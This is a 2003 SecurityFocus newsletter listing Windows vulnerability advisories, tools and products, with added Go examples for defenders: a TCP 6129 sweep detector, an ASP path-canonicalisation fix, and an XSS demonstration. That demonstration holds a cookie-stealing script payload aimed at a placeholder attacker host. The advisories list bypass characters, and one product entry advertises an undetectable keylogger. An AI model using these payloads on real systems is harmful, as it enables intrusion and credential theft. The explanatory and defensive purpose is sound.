SecurityFocus Microsoft Newsletter #168
----------------------------------------
SecurityFocus.com would like to take this opportunity to express our
gratitude for your continued support. In the upcoming year we will improve
and grow so we can continue to provide you with all your essential
security resources.
We would also like to wish you all a great Holiday Season, and a
prosperous New Year.
-The staff at SecurityFocus.com
------------------------------------------------------------------------
I. FRONT AND CENTER
1. Nessus, Part 2: Scanning
2. Low-Level Enumeration With TCP/IP
II. MICROSOFT VULNERABILITY SUMMARY
1. Multiple Vendor IKE Implementation Certificate Authenticity ...
2. DameWare Mini Remote Control Server Pre-Authentication Buffe...
3. XLight FTP Server Tilde Remote Denial Of Service Vulnerabili...
4. Microsoft Internet Explorer Unspecified Remote Compromise Vu...
5. XLight FTP Server Unspecified Remote Directory Traversal Vul...
6. Doro PDF Writer Local Privilege Escalation Vulnerability
7. Ipswitch WS_FTP Server Resource Consumption Remote Denial Of...
8. GoAhead Webserver ASP Script File Source Code Disclosure Vul...
9. ECW-Shop Cat Parameter Cross-Site Scripting Vulnerability
III. MICROSOFT FOCUS LIST SUMMARY
1. TCP/IP Stack Hardening (Thread)
2. FW: TCP/IP Stack Hardening (Thread)
3. FW: Local Security Policy (Thread)
4. Local Security Policy (Thread)
5. Info on deploying ICF on XP sp2 in a managed environ... (Thread)
6. SecurityFocus Microsoft Newsletter #167 (Thread)
7. Blessed Windows Security Templates (Thread)
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
1. AccessMaster
2. KeyGhost SX
3. SafeKit
4. SecurDataStor
5. Proactive Windows Security Explorer
6. Outpost Personal Firewall Pro 2.0
V. NEW TOOLS FOR MICROSOFT PLATFORMS
1. Stealth HTTP Security Scanner v2.0b47
2. IDA Pro - Freeware Edition
3. Enigmail v0.82.5
4. Cryptonit v0.9.1
5. OpenSSL 0.9.7c
6. mrtg v2.10.7
VI. UNSUBSCRIBE INSTRUCTIONS
VII. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Nessus, Part 2: Scanning
By Harry Anderson
This article, the second in the series, provides direction through the
scanning process with Nessus, a powerful open source vulnerability
scanner.
http://www.securityfocus.com/infocus/1753
2. Low-Level Enumeration With TCP/IP
by Randy Williams (Guest Feature)
This paper explains the theory and concepts behind many of today's advanced
scanning techniques and shows you what is going on behind the scenes.
http://www.securityfocus.com/guest/24226
II. MICROSOFT VULNERABILITY SUMMARY
-----------------------------------
1. Multiple Vendor IKE Implementation Certificate Authenticity ...
BugTraq ID: 9208
Remote: Yes
Date Published: Dec 12 2003
Relevant URL: http://www.securityfocus.com/bid/9208
Summary:
IKE is the Internet Key Exchange protocol. It is used for the negotiation
of authentication and encryption methods and keys during VPN session
initiation.
It has been reported that some default IKE implementations may carry out
insufficient certificate authenticity verification.
The vulnerability lies in the fact that some implementations fail to
thoroughly verify the authenticity of client/server certificates.
Specifically, a client or server verifies the authenticity of a peer's
certificate only by checking that the Certificate Authority (CA) that signed
it is the same CA that signed its own certificate. No attempt is made to
verify that the identity named in the certificate is the peer that is
supposed to be on the other end of the tunnel.
Exploitation of this issue may be carried out in a number of ways,
depending on the specific IKE implementation. An attacker holding any
certificate issued by the same CA may impersonate a client and present that
certificate after an IKE and authentication session has been established
between the legitimate client and server. If this were to occur, the
attacker's certificate would be erroneously trusted and IKE would be
renegotiated with the attacker, potentially granting the attacker access to
the entire session. The attacker may also carry out a man-in-the-middle
attack by impersonating a server and initiating an IKE session with a
client. Other attacks are also possible.
It should be noted that the researcher specifically mentioned certain
vendor VPN clients as being vulnerable, but also that only some
devices/products are vulnerable, and only under some configurations. At the
time of writing, Symantec has not confirmed which products/devices are
directly affected, so all vendor VPN clients have been listed as
potentially vulnerable. These details will be modified and/or clarified as
further information is made available.
The researcher has explicitly stated that Windows 2000 SP2 and later, as
well as Windows XP, use such an implementation. Moreover, it is said that
this implementation cannot be configured to require different CAs for
server and client certificates, potentially making attacks unavoidable.
The researcher has indirectly stated that the following other vendors may
be affected: Cisco, Nortel, FreeSWAN and Certicom. It should be noted
that other vendors/products may be affected as well, and specific products
listed as vulnerable may not be explicitly affected.
2. DameWare Mini Remote Control Server Pre-Authentication Buffe...
BugTraq ID: 9213
Remote: Yes
Date Published: Dec 15 2003
Relevant URL: http://www.securityfocus.com/bid/9213
Summary:
DameWare Mini Remote Control Server is a remote administration tool
distributed and maintained by DameWare Development. It is available for
the Microsoft Windows platform.
A problem has been identified in the handling of pre-authentication
packets by DameWare Mini Remote Control Server. Because of this, it may
be possible for a remote attacker to gain unauthorized access to hosts
using the vulnerable software.
The problem is in the handling of packets containing the
pre-authentication information required by DameWare to authenticate remote
administrators. These packets are usually received through the program
listening port (default TCP 6129), and typically contain the following
information:
Local username
Remote username
Local NetBIOS name
Company Name
Registration Name
Registration Key
Date
Time
Lower case NetBIOS name
IP Address(s) of the client
Version of the remote client
The vulnerability exists when all this information is passed to a function
containing a vulnerable strcpy-like routine. By placing custom,
maliciously crafted data in these variables and sending them in a packet
to the remote host, it is possible to trigger a potentially exploitable
buffer overflow.
**December 21, 2003 - Increased scanning activity, which may be associated
with this issue, has been reported on TCP port 6129. This port is
associated with DameWare Mini Remote Control Server as the listening port.
Exploit code for this issue was released on December 19, 2003. It
contains offsets for many Windows 2000 service packs in English and French
as well as Windows XP SP3.
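Given the scanning activity reported above, the practical first step is to
find out who is sweeping for TCP 6129 on your own network. The following is
an added example, not code from DameWare or from the exploit mentioned, and
the firewall log lines it reads are constructed in an invented key=value
format rather than captured traffic. It counts, per source address, how many
distinct hosts were touched on the port and flags sources that exceed a
threshold, which separates a sweep from the single connection a legitimate
administrator would make.

```go
package main

import (
	"bufio"
	"fmt"
	"sort"
	"strconv"
	"strings"
)

// sampleLog is constructed for this example, in an invented key=value
// firewall log format; it is not captured traffic. One source sweeps the
// local subnet on TCP/6129, one admin host makes a single legitimate
// connection, and a third host probes two machines.
const sampleLog = `Dec 21 03:14:07 fw1 kernel: DROP proto=TCP src=10.0.0.5 dst=192.168.1.10 dport=6129
Dec 21 03:14:07 fw1 kernel: DROP proto=TCP src=10.0.0.5 dst=192.168.1.11 dport=6129
Dec 21 03:14:08 fw1 kernel: DROP proto=TCP src=10.0.0.5 dst=192.168.1.12 dport=6129
Dec 21 03:14:08 fw1 kernel: DROP proto=TCP src=10.0.0.5 dst=192.168.1.13 dport=6129
Dec 21 03:14:09 fw1 kernel: ACCEPT proto=TCP src=10.0.0.5 dst=192.168.1.14 dport=6129
Dec 21 03:14:09 fw1 kernel: DROP proto=TCP src=10.0.0.5 dst=192.168.1.15 dport=6129
Dec 21 03:14:10 fw1 kernel: DROP proto=TCP src=10.0.0.5 dst=192.168.1.10 dport=6129
Dec 21 03:15:01 fw1 kernel: ACCEPT proto=TCP src=192.168.1.20 dst=192.168.1.14 dport=6129
Dec 21 03:15:30 fw1 kernel: DROP proto=TCP src=172.16.0.9 dst=192.168.1.10 dport=6129
Dec 21 03:15:31 fw1 kernel: DROP proto=TCP src=172.16.0.9 dst=192.168.1.11 dport=6129
Dec 21 03:16:00 fw1 kernel: DROP proto=TCP src=172.16.0.9 dst=192.168.1.12 dport=445
Dec 21 03:16:02 fw1 kernel: ACCEPT proto=UDP src=10.0.0.5 dst=192.168.1.1 dport=53
`

type conn struct {
	proto, src, dst string
	dport           int
}

// parseLine pulls the key=value fields out of one log line. Lines without
// src, dst and a numeric dport are skipped rather than treated as events.
func parseLine(line string) (conn, bool) {
	fields := map[string]string{}
	for _, tok := range strings.Fields(line) {
		if kv := strings.SplitN(tok, "=", 2); len(kv) == 2 {
			fields[kv[0]] = kv[1]
		}
	}
	port, err := strconv.Atoi(fields["dport"])
	if err != nil || fields["src"] == "" || fields["dst"] == "" {
		return conn{}, false
	}
	return conn{proto: fields["proto"], src: fields["src"], dst: fields["dst"], dport: port}, true
}

// DistinctTargets counts, per source, how many distinct hosts it touched on
// the given TCP port. Repeated hits on the same host count once, and whether
// the firewall accepted or dropped the packet is irrelevant to a sweep.
func DistinctTargets(log string, port int) map[string]int {
	seen := map[string]map[string]bool{}
	sc := bufio.NewScanner(strings.NewReader(log))
	for sc.Scan() {
		c, ok := parseLine(sc.Text())
		if !ok || c.proto != "TCP" || c.dport != port {
			continue
		}
		if seen[c.src] == nil {
			seen[c.src] = map[string]bool{}
		}
		seen[c.src][c.dst] = true
	}
	out := map[string]int{}
	for src, dsts := range seen {
		out[src] = len(dsts)
	}
	return out
}

// Scanners returns the sources that touched at least minHosts distinct hosts
// on port, sorted so the output is stable.
func Scanners(log string, port, minHosts int) []string {
	var hits []string
	for src, n := range DistinctTargets(log, port) {
		if n >= minHosts {
			hits = append(hits, src)
		}
	}
	sort.Strings(hits)
	return hits
}

func main() {
	for src, n := range DistinctTargets(sampleLog, 6129) {
		fmt.Printf("%-14s distinct hosts on 6129: %d\n", src, n)
	}
	fmt.Println("sweep sources:", Scanners(sampleLog, 6129, 5))
}
```

The threshold is a tuning knob: a management host that legitimately reaches
every workstation will also score high, so whitelist known administration
hosts before alerting, and run the count over a time window rather than a
whole day's log.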
3. XLight FTP Server Tilde Remote Denial Of Service Vulnerabili...
BugTraq ID: 9215
Remote: Yes
Date Published: Dec 15 2003
Relevant URL: http://www.securityfocus.com/bid/9215
Summary:
XLight FTP Server is a commercially available FTP server. It is available
for the Microsoft Windows platform.
A problem has been identified in the XLight FTP Server when handling
certain characters in FTP command arguments. An attacker could take
advantage of this issue to perform a denial of service against vulnerable
hosts.
The problem is in the handling of the tilde character. When a change
directory command (CWD, sent by the cd command of most clients) is issued
with a tilde (~) as its argument, the server becomes unstable. It has been
reported that this issue can be exploited to force the server to become
unstable and crash. A manual restart of the server is required to resume
normal operation.
4. Microsoft Internet Explorer Unspecified Remote Compromise Vu...
BugTraq ID: 9216
Remote: Yes
Date Published: Dec 15 2003
Relevant URL: http://www.securityfocus.com/bid/9216
Summary:
A reliable source has publicized an Internet Explorer exploit, entitled
1stCleanRc-Xp, which will reportedly allow for installation and
execution of a malicious executable on a vulnerable client system. This
exploit is reported to affect current versions of Internet Explorer, with
all patches applied, on Microsoft Windows 2000/XP.
The exploit appears to use a number of vulnerabilities to cause malicious
Active Content to be interpreted in the Local Zone, resulting in silent
installation and execution of malicious code. The exploit does not
require user interaction other than visiting a malicious web page.
Further technical details are not known at this time and it is likely that
other known issues are used in this exploit, such as those described in
BIDs 9105 and 9107. This BID will be updated when further information is
made available. If multiple new vulnerabilities are being exploited, the
BID will be divided into new individual BIDs for each issue. Existing
BIDs will also be updated appropriately.
It is currently not known if this affects versions prior to 6.0.
5. XLight FTP Server Unspecified Remote Directory Traversal Vul...
BugTraq ID: 9219
Remote: Yes
Date Published: Dec 15 2003
Relevant URL: http://www.securityfocus.com/bid/9219
Summary:
XLight FTP Server is a commercially available FTP server. It is available
for the Microsoft Windows platform.
A problem has been identified in the XLight FTP Server when handling
certain characters in FTP command arguments. Because of this, an attacker
could potentially gain access to sensitive information on vulnerable hosts.
Specific details concerning this issue are not available. What is known
is that it is possible for attackers to gain access to files outside of
the FTP root directory. An attacker taking advantage of this issue could
gain access to files with the same permissions granted to the FTP server
software.
This Bugtraq ID will be further updated when additional information is
available.
6. Doro PDF Writer Local Privilege Escalation Vulnerability
BugTraq ID: 9220
Remote: No
Date Published: Dec 15 2003
Relevant URL: http://www.securityfocus.com/bid/9220
Summary:
Doro PDF writer is a free PDF document creation utility available for
Microsoft Windows platforms.
Doro PDF writer has been reported prone to a vulnerability that may allow
a local user to elevate privileges. The issue presents itself because,
when installed, Doro PDF writer registers a printer named 'Doro PDF
Writer'. When a document is printed to this printer, the print spooler
calls the print filter 'doro.dll'. This DLL is invoked with SYSTEM
privileges. The DLL in turn invokes the next stage of execution,
'doro.exe', which reportedly spawns a file requester dialog. Because this
dialog inherits SYSTEM privileges, an attacker may use it to launch any
program with SYSTEM privileges; for example, the attacker may invoke
cmd.exe to spawn a privileged command shell.
A local attacker may exploit this condition to perform arbitrary
unauthorized administrative tasks on the vulnerable system.
It should be noted that although this vulnerability has been reported to
affect Doro PDF writer version 1.13, other versions might also be
affected.
7. Ipswitch WS_FTP Server Resource Consumption Remote Denial Of...
BugTraq ID: 9237
Remote: Yes
Date Published: Dec 17 2003
Relevant URL: http://www.securityfocus.com/bid/9237
Summary:
Ipswitch WS_FTP Server is an FTP implementation that is available for
Microsoft Windows operating systems.
WS_FTP Server has been reported prone to a resource consumption issue that
may lead to a denial of service. It has been reported that a remote
attacker who has sufficient privileges to log into an affected server may
trigger this vulnerability by passing a sequence of period characters
('.') as the argument of the CWD (Change Working Directory) FTP command.
Subsequent to this action, the attacker then needs to create a directory
using the FTP MKD command. This reportedly causes the WS_FTP server to
consume system resources at an exponential rate and behave in an unstable
manner. Ultimately a remote attacker may exploit this condition to deny
service to legitimate WS_FTP users.
It should be noted that while this vulnerability has been reported to
affect WS_FTP version 4.02, other versions might also be affected.
8. GoAhead Webserver ASP Script File Source Code Disclosure Vul...
BugTraq ID: 9239
Remote: Yes
Date Published: Dec 17 2003
Relevant URL: http://www.securityfocus.com/bid/9239
Summary:
GoAhead WebServer is an Open Source embedded web server which supports
Active Server Pages, embedded javascript, and SSL authentication and
encryption. It is available for a variety of platforms including Microsoft
Windows and Linux variant operating systems.
A vulnerability has been reported in GoAhead WebServer that may result in
the disclosure of ASP script files' source code. The vulnerability exists
due to insufficient sanitization of HTTP requests to the affected server.
A malicious attacker can append a '%00', '%2f', '%5c', '/' or '\'
character to the end of an HTTP request for a specific ASP file. This
results in GoAhead WebServer divulging the contents of the requested ASP
script file to the attacker rather than executing it.
Information obtained in this manner may be used by the attacker to launch
further attacks against the vulnerable system.
GoAhead webserver versions up to and including 2.1.7 are reported
vulnerable to this issue.
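The root cause is a handler decision made on the raw request path before it
is decoded and normalised. The following is an added example and not
GoAhead's code; it contrasts that naive suffix check with a classifier that
decodes, refuses NUL bytes, treats backslash as a separator (the server ships
for Windows) and cleans the path before deciding from the canonical name
whether the target is a script. The request paths in main are constructed
test inputs built from the characters the advisory lists.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"path"
	"strings"
)

// naiveIsASP mirrors the pattern the advisory's bypass defeats: the raw,
// undecoded request path is tested for an ".asp" suffix. Anything appended
// after the extension makes the request look like a non-ASP file, so it
// falls through to the static-file handler, which reads the script from disk
// and returns its source.
func naiveIsASP(rawPath string) bool {
	return strings.HasSuffix(strings.ToLower(rawPath), ".asp")
}

// Classify is the hardened version: decode first, refuse NUL bytes outright,
// treat backslash as a separator, clean the path, and only then decide from
// the canonical name whether the target is a script. A script is dispatched
// to the ASP engine or refused; it is never handed to the raw file handler.
func Classify(rawPath string) (canonical string, isASP bool, err error) {
	p, err := url.PathUnescape(rawPath)
	if err != nil {
		return "", false, err
	}
	if strings.ContainsRune(p, 0) {
		return "", false, errors.New("NUL byte in request path")
	}
	p = strings.ReplaceAll(p, `\`, "/")
	// Clean also collapses "..", so the result stays under the document root.
	canonical = path.Clean("/" + p)
	isASP = strings.EqualFold(path.Ext(canonical), ".asp")
	return canonical, isASP, nil
}

func main() {
	// Constructed request paths: the bypass variants from the advisory plus
	// a few controls.
	for _, raw := range []string{
		"/login.asp", "/login.asp%00", "/login.asp%2f", "/login.asp%5c",
		"/login.asp/", `/login.asp\`, "/LOGIN.ASP", "/images/logo.gif", "/../etc/login.asp",
	} {
		canon, asp, err := Classify(raw)
		fmt.Printf("%-20s naive=%-5v canonical=%-16q asp=%-5v err=%v\n",
			raw, naiveIsASP(raw), canon, asp, err)
	}
}
```

Whether a request such as /login.asp/ should then be executed or answered
with 404 is a policy choice; what matters is that the decision is made on
the same name the filesystem will open, so the script can never reach the
static-file path.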
9. ECW-Shop Cat Parameter Cross-Site Scripting Vulnerability
BugTraq ID: 9244
Remote: Yes
Date Published: Dec 18 2003
Relevant URL: http://www.securityfocus.com/bid/9244
Summary:
ECW-Shop is web-based e-commerce software for Microsoft Windows operating
systems.
ECW-Shop is prone to cross-site scripting attacks. It is reported that
this issue is exploitable via the 'cat' URI parameter of one of the
scripts. The source of the problem is that input is not adequately
sanitized when passed through this parameter, and this input will be
included in dynamically generated web pages. An attacker could exploit
this issue by constructing a malicious link with hostile HTML and script
code embedded in URI parameters. This code may be rendered in the browser
of a user who visits the malicious link. Exploitation could allow for
theft of cookie-based authentication credentials or other attacks.
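The defect and its fix in miniature, as an added example that is not
ECW-Shop's code (the product's scripts are not public here, so the page
shape and the query string are constructed; attacker.example is a
placeholder host). The unsafe renderer concatenates the decoded 'cat' value
into the markup, which is how a link carrying script reaches the victim's
browser; the safe renderer emits the same heading through html/template,
which escapes the value for the HTML text context it lands in.

```go
package main

import (
	"fmt"
	"html/template"
	"net/url"
	"strings"
)

// attackQuery is a constructed query string: the 'cat' value carries a
// script that ships document.cookie to an attacker-controlled host
// (attacker.example is a placeholder, not a real site).
const attackQuery = "cat=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fattacker.example%2F%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E"

// UnsafeRender splices the decoded parameter straight into the markup, which
// is the pattern behind the advisory.
func UnsafeRender(rawQuery string) (string, error) {
	q, err := url.ParseQuery(rawQuery)
	if err != nil {
		return "", err
	}
	return "<h1>Category: " + q.Get("cat") + "</h1>", nil
}

// page renders the same heading through html/template, which escapes the
// value for the HTML text context it lands in.
var page = template.Must(template.New("cat").Parse("<h1>Category: {{.}}</h1>"))

// SafeRender is the corrected renderer: same input, escaped output.
func SafeRender(rawQuery string) (string, error) {
	q, err := url.ParseQuery(rawQuery)
	if err != nil {
		return "", err
	}
	var sb strings.Builder
	if err := page.Execute(&sb, q.Get("cat")); err != nil {
		return "", err
	}
	return sb.String(), nil
}

func main() {
	u, _ := UnsafeRender(attackQuery)
	s, _ := SafeRender(attackQuery)
	fmt.Println("unsafe:", u)
	fmt.Println("safe:  ", s)
}
```

Escaping is context-dependent: the same value placed inside an attribute, a
URL or a script block needs different treatment, which is why a
context-aware templating layer is preferable to a single escape function
applied by hand.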
III. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. TCP/IP Stack Hardening (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/348203
2. FW: TCP/IP Stack Hardening (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/348201
3. FW: Local Security Policy (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/348199
4. Local Security Policy (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/348053
5. Info on deploying ICF on XP sp2 in a managed environ... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/347963
6. SecurityFocus Microsoft Newsletter #167 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/347663
7. Blessed Windows Security Templates (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/347509
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
----------------------------------------
1. AccessMaster
By: Evidian Inc.
Platforms: IRIX, Solaris, Windows 2000, Windows 95/98, Windows NT
Relevant URL: http://www.evidian.com/accessmaster/about/index.htm
Summary:
Extending onto a networked world means embracing the unknown. Piracy,
vandalism, industrial espionage... - attacks on companies are doubling
each year. With uniquely integrated security software, AccessMaster
manages and safeguards access to your data, end-to-end, from portals to
legacy, and lets you enforce a single, unified security policy across the
enterprise and beyond.
AccessMaster ensures high security level by federating your existing
security solutions, while ensuring at the same time user's convenience
with Single Sign-On and security officer's ease of administration with
centralized, Ldap-compliant, user and PKI management. In this way,
AccessMaster reduces IT security cost of ownership, with rapid return on
investment.
AccessMaster is recognized by analysts as a leading security suite for
large enterprises today. It was awarded best access control software by
Secure Computing Magazine three years running, in 2000, 2001, and 2002.
2. KeyGhost SX
By: KeyGhost Ltd
Platforms: BeOS, DOS, Linux, OS/2, Solaris, SunOS, Windows 2000, Windows
95/98, Windows NT, Windows XP
Relevant URL: http://www.keyghost.com/SX/
Summary:
KeyGhost SX discreetly captures and records all keystrokes typed,
including chat conversations, email, word processor, or even activity
within an accounting or specialist system. It is completely undetectable
by software scanners and provides you with one of the most powerful
stealth surveillance applications offered anywhere.
Because KeyGhost uses STRONG 128-Bit encryption to store the recorded data
in its own internal memory (not on the hard drive), it is impossible for
a network intruder to gain access to any sensitive data stored within the
device.
3. SafeKit
By: Evidian Inc.
Platforms: AIX, HP-UX, Linux, Solaris, Windows 2000
Relevant URL: http://www.evidian.com/safekit/index.htm
Summary:
Evidian's SafeKit technology makes it possible to render any application
available 24 hours per day. With no extra hardware: just use your existing
servers and install this software-only solution.
This provides ultimate scalability. As your needs grow, all you need to do
is add more standard servers into the cluster. With the load balancing
features of SafeKit, you can distribute applications over multiple
servers. If one system fails completely, the others will continue to serve
your users.
4. SecurDataStor
By: encryptX Corporation
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL: http://www.encryptx.com/products/securdatastor.asp
Summary:
The SecurDataStor product line is designed to provide a comprehensive
software security solution that manages and controls access to sensitive
information that you need to share internally and externally.
SecurDataStor is available in three versions: Basic, Premium, and
Platinum. Depending on the level of security that you need, you can choose
the SecurDataStor product that suits your needs.
With its end-to-end protection of sensitive business information,
SecurDataStor products protect sensitive information when used by the
originator, stored locally on a hard drive or file server, and when
shared. Users can safely share sensitive information across different
Microsoft Windows operating systems, over different network and firewall
technologies, and across different forms of removable media.
5. Proactive Windows Security Explorer
By: Elcomsoft Co. Ltd.
Platforms: Windows 2000, Windows NT, Windows XP
Relevant URL: http://www.elcomsoft.com/pwsex.html#
Summary:
Proactive Windows Security Explorer (PWSEX) is a password security test
tool that's designed to allow Windows NT, Windows 2000, and Windows
XP-based systems administrators to identify and close security holes in
their networks. Proactive Windows Security Explorer helps secure networks
by executing an audit of account passwords, and exposing insecure account
passwords. If it is possible to recover the password within a reasonable
time, the password is considered insecure.
An administrator can also use it to recover any lost password and access a
user's Windows account. Proactive Windows Security Explorer works by
analyzing user password hashes and recovering plain-text passwords.
6. Outpost Personal Firewall Pro 2.0
By: Agnitum
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL: http://www.outpost.uk.com
Summary:
New Outpost Personal Firewall Pro 2.0 outdistances the award-winning
Outpost Personal Firewall Pro 1.0 on multiple levels, from enhanced
privacy features to ease-of-use. As the foremost security application for
personal computers, Outpost Personal Firewall Pro 2.0 gives you the latest
in personal firewall technology, making version 2.0 the clear security
choice for your system.
V. NEW TOOLS FOR MICROSOFT PLATFORMS
------------------------------------
1. Stealth HTTP Security Scanner v2.0b47
By: qw erty
Relevant URL: http://www.devhood.com/tools/tool_details.aspx?tool_id=353
Platforms: Linux, Windows 2000, Windows 95/98, Windows NT
Summary:
Stealth 1.0 scans for 2883 HTTP vulnerabilities. This tool is designed
especially for the system administrators, security consultants and IT
professionals to check the possible security holes and to confirm any
present security vulnerabilities that hackers can exploit. Totally free
for commercial and non-commercial use.
2. IDA Pro - Freeware Edition
By: DataRescue Inc.
Relevant URL: http://www.datarescue.com/idabase
Platforms: DOS, Windows 2000, Windows 95/98, Windows NT
Summary:
The freeware version of the Interactive Disassembler Pro. Supports 80x86
binaries and FLIRT, a unique Fast Library Identification and Recognition
Technology that automagically recognizes standard compiler library calls.
Widely used in COTS validation and hostile code analysis.
3. Enigmail v0.82.5
By: Patrick
Relevant URL: http://enigmail.mozdev.org/thunderbird.html
Platforms: Linux, MacOS, POSIX, UNIX, Windows 2000, Windows 3.x, Windows
95/98, Windows CE, Windows NT, Windows XP
Summary:
Enigmail is a plugin for the mail client of Mozilla and Netscape 7.x
which allows users to access the authentication and encryption features
provided by the popular GnuPG software. Enigmail can encrypt/sign mail
when sending, and can decrypt/authenticate received mail. It can also
import/export public keys. Enigmail supports both the inline PGP format
and the PGP/MIME format, which can be used to encrypt attachments.
Enigmail is cross-platform, although binaries are supplied only for a
limited number of platforms. Enigmail uses inter-process communication to
execute GPG to carry out encryption/authentication.
4. Cryptonit v0.9.1
By: IDEALX
Relevant URL: http://cryptonit.org/
Platforms: Linux, MacOS, Windows 2000, Windows NT, Windows XP
Summary:
Cryptonit is a client side cryptographic tool which allows you to
encrypt/decrypt and sign/verify files with PKI (Public Key Infrastructure)
certificates.
5. OpenSSL 0.9.7c
By: The OpenSSL Project Team
Relevant URL: http://www.openssl.org/
Platforms: UNIX, Windows NT
Summary:
The OpenSSL Project is a collaborative effort to develop a robust,
commercial-grade, fully featured, and Open Source toolkit implementing the
Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) as
well as a full-strength general-purpose cryptography library.
6. mrtg v2.10.7
By: Tobias Oetiker
Relevant URL: http://people.ee.ethz.ch/~oetiker/webtools/mrtg/
Platforms: POSIX, Windows 2000, Windows NT
Summary:
The Multi Router Traffic Grapher (MRTG) is a tool to monitor the traffic
load on network-links. MRTG generates HTML pages containing GIF/PNG images
which provide a live visual representation of this traffic.
VI. UNSUBSCRIBE INSTRUCTIONS
----------------------------
To unsubscribe send an e-mail message to
[email protected] from the subscribed address. The
contents of the subject or message body do not matter. You will receive a
confirmation request message to which you will have to answer.
Alternatively you can also visit http://www.securityfocus.com/newsletters
and unsubscribe via the website.
If your email address has changed email [email protected] and
ask to be manually removed.
VII. SPONSOR INFORMATION
-----------------------
SecurityFocus.com would like to take this opportunity to express our
gratitude for your continued support. In the upcoming year we will improve
and grow so we can continue to provide you with all your essential
security resources.
We would also like to wish you all a great Holiday Season, and a
prosperous New Year.
-The staff at SecurityFocus.com
------------------------------------------------------------------------
Posted on Friday, 26 December 2003 @ 04:00:00 EST by phoenix22